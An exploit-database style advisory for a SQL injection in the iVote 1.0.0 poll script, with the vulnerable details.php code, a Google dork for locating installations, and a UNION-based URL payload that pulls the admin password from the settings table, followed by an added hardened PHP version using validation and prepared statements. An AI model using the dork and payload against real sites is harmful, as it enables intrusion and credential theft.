iVote version 1.0.0 suffers from a remote SQL injection vulnerability.
e92df3a9e230ad705c3cf0adc85407a1af9aa864677da01463fad9083153b548
# Exploit Title: iVote SQL Injection
# Google Dork: inurl:details.php?id=
# Date: 2013 July 11
# Exploit Author: Ashiyane Digital Security Team
# Software Link: http://www.persianscript.ir/1391/09/25/ivote-poll-persian-script-download/
# Version: 1.0.0
# Tested on: Linux CentOS, Linux Ubuntu, Windows 8
Vulnerability: details.php, line 5. The id request parameter is placed into both queries below without validation or escaping:
$id = $_GET['id'];
$selectc = mysql_query("SELECT * FROM comments WHERE id = $id");
$select = mysql_query("SELECT * FROM votes WHERE V_Id = $id");
$row = mysql_fetch_array($select);
///////////////////////////////////////
Example : http://example.com/iVote/details.php?id=1 union select 1,password,3,4 from settings
///////////////////////
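A hardened form of the lookup shown above, as an added example (not iVote's code and not from the advisory author): the id is validated as a positive integer and then bound as a parameter instead of being concatenated into the SQL. It assumes PDO with an in-memory SQLite database so that it runs offline; the function name load_details, the sample rows and every column not named in the advisory are constructed for illustration.

```php
<?php
// Added example: hardened lookup for details.php (not iVote's own code).
// Assumption: PDO with the pdo_sqlite driver, used only so the demo runs
// offline; in the real script the DSN would point at the MySQL database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

// Constructed sample schema and rows. Names follow the advisory where it
// gives them (comments.id, votes.V_Id, settings.password); the rest is made up.
$db->exec("CREATE TABLE votes (V_Id INTEGER, title TEXT, a INTEGER, b INTEGER)");
$db->exec("CREATE TABLE comments (id INTEGER, body TEXT)");
$db->exec("CREATE TABLE settings (password TEXT)");
$db->exec("INSERT INTO votes VALUES (1, 'sample poll', 0, 0)");
$db->exec("INSERT INTO comments VALUES (1, 'sample comment')");
$db->exec("INSERT INTO settings VALUES ('constructed-secret')");

// Returns the poll row and its comments, or null when id is not a positive integer.
function load_details(PDO $db, $rawId): ?array
{
    // 1. Strict validation: the whole parameter must be an integer >= 1,
    //    so trailing SQL text makes the request fail before any query runs.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    // 2. Parameter binding: the value never becomes part of the SQL text.
    $vote = $db->prepare('SELECT * FROM votes WHERE V_Id = :id');
    $vote->bindValue(':id', $id, PDO::PARAM_INT);
    $vote->execute();
    $comments = $db->prepare('SELECT * FROM comments WHERE id = :id');
    $comments->bindValue(':id', $id, PDO::PARAM_INT);
    $comments->execute();
    return [
        'vote' => $vote->fetch(PDO::FETCH_ASSOC) ?: null,
        'comments' => $comments->fetchAll(PDO::FETCH_ASSOC),
    ];
}

// The id value from the advisory's example request is rejected by validation.
var_dump(load_details($db, '1 union select 1,password,3,4 from settings'));
// A well-formed id returns only the matching poll row and its comments.
print_r(load_details($db, '1'));
```

In details.php the second argument would be `$_GET['id'] ?? null`. The `mysql_*` functions used by the original script were removed in PHP 7, so moving to PDO or mysqli is needed in any case.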
TNX : Rz04 & Crypt0
I Love Iran & all IRanian Black Hats :X
I'm , Bi Edea (R3za)
Email : momtane666@yahoo.com
Gmail : kafaran.blackhats@Gmail.com